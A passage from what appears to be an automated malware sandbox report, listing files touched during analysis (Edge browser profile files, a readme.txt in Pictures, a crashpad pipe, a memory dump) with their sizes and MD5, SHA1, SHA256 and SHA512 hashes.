0c80aa574b64e6e38b787a74709b8f0fb1045aeb

SHA256
3197fe544dc9cfff2c05d4ec785744feb964d99fa761dd0ddb89a67e5ac52b07

SHA512
6b3c9b60af3d59f134724567a128117b0500c1ea885cc009a2c40a5ebdfe443da2021abcb73385ef12bdb62b3e2b55f5c8c896ba9e447702700657673ea3f567

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
2bbbdb35220e81614659f8e50e6b8a44

SHA1
7729a18e075646fb77eb7319e30d346552a6c9de

SHA256
73f853ad74a9ac44bc4edf5a6499d237c940c905d3d62ea617fbb58d5e92a8dd

SHA512
59c5c7c0fbe53fa34299395db6e671acfc224dee54c7e1e00b1ce3c8e4dfb308bf2d170dfdbdda9ca32b4ad0281cde7bd6ae08ea87544ea5324bcb94a631f899

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
618e2ea5a44281a69f1684a45ff98ce9

SHA1
88c41a20ce8e2fa1805c2d3b109bda5c5fe6c562

SHA256
f7dd8b4f61c7fba4146ec1cbf43da18fe4c852720fbb37f150b51874eb01136a

SHA512
dd6e5357347343f6ca42487bd9133245b30aa71eb44bda84934a06e1a57846168dfba2c115be55d4a621bf082a7085c8aa77aa8e289c2fa07563062ed727f195

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
e9194296601b7cb4db523e3aad5b7e04

SHA1
f95944a3980220c49fb2474677c67a34ce4ae111

SHA256
abdccb1d6a47c9a236dd15228fa60526b7579f5634ec2931871dcb34287c0e88

SHA512
f6019bb0dbe1670a5c3c8c7cfc7a2e2b285780722381123b6339d4ebb63bf9491614ec90a2033e7b97c2bd0c592124bbf6b6bf0a37169045ada125f4fe58be92

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
be89a7eec70066c2d22e8ec40aa0fbad

SHA1
ab064f817f9eb666fdcefa4cd81b93fed3394521

SHA256
69b7646fa27fbfdd9b8c52a9f416c29699dc2b2fee81e92e67815fdf87eb67c1

SHA512
0fa5888c63c84a877f75126745fd03013b7c9402b9e74aed032d10a9814e331705eb07f1d1d6dd3738cbeafaa969943ca345e8cb25ea7f66a170760eda1b8349

Download Submit
\??\pipe\LOCAL\crashpad_4396_ONDZBWMKGHNLBHSG

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/4636-0-0x0000022E7DB30000-0x0000022E7E475000-memory.dmp

Filesize
9.3MB

Download